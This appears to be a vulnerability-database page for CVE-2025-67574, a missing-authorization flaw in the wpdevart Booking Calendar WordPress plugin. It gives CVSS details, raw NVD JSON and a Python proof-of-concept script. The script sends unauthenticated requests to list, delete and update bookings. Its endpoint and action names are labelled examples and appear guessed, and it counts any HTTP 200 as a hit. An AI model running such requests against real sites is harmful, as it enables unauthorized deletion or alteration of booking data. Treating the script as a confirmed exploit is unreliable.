Security Vulnerability Report
中文
CVE-2025-67574 CVSS 5.3 MEDIUM

CVE-2025-67574

Published: 2025-12-09 16:18:35
Last Modified: 2026-04-27 18:16:44

Description

Missing Authorization vulnerability in wpdevart Booking calendar, Appointment Booking System booking-calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking calendar, Appointment Booking System: from n/a through <= 3.2.30.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

wpdevart Booking Calendar, Appointment Booking System <= 3.2.30

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67574 PoC - WordPress Booking Calendar Broken Access Control # Author: Security Researcher # Target: wpdevart Booking Calendar Plugin <= 3.2.30 import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-67574 Missing Authorization in Booking Calendar plugin """ print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-67574 - Missing Authorization Vulnerability\n") # Target WordPress site target = target_url.rstrip('/') # Identify vulnerable endpoints (example paths) vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wpdevart-booking/v1/', '/?rest_route=/wpdevart-booking/v1/' ] # Example malicious requests that should require authorization test_payloads = [ { 'action': 'wpdevart_booking_get_appointments', 'data': '{"all":true}' }, { 'action': 'wpdevart_booking_delete', 'booking_id': '1' }, { 'action': 'wpdevart_booking_update', 'data': '{"status":"confirmed"}' } ] print("[*] Sending test requests without authentication...\n") for endpoint in vulnerable_endpoints: for payload in test_payloads: try: url = f"{target}{endpoint}" response = requests.post(url, data=payload, timeout=10) # Check for successful unauthorized access if response.status_code == 200: print(f"[!] Potential vulnerability found!") print(f"[!] Endpoint: {endpoint}") print(f"[!] Payload: {payload}") print(f"[!] Response Status: {response.status_code}") print(f"[!] Response Preview: {response.text[:200]}...\n") except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {str(e)}") print("\n[*] Testing complete. Manual verification recommended.") print("[*] Check Patchstack database for detailed exploitation steps.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-67574.py <target_url>") print("Example: python cve-2025-67574.py http://example.com") sys.exit(1) target_url = sys.argv[1] check_vulnerability(target_url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67574", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:34.520", "lastModified": "2026-04-27T18:16:43.813", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in wpdevart Booking calendar, Appointment Booking System booking-calendar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booking calendar, Appointment Booking System: from n/a through <= 3.2.30."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/booking-calendar/vulnerability/wordpress-booking-calendar-appointment-booking-system-plugin-3-2-30-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}